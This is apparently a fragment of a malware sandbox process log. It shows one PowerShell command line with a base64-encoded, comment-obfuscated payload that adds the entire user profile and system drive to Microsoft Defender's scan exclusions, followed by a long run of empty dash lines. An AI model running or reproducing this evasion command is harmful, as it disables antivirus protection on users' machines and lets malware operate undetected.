C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="122⤵PID:5008
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-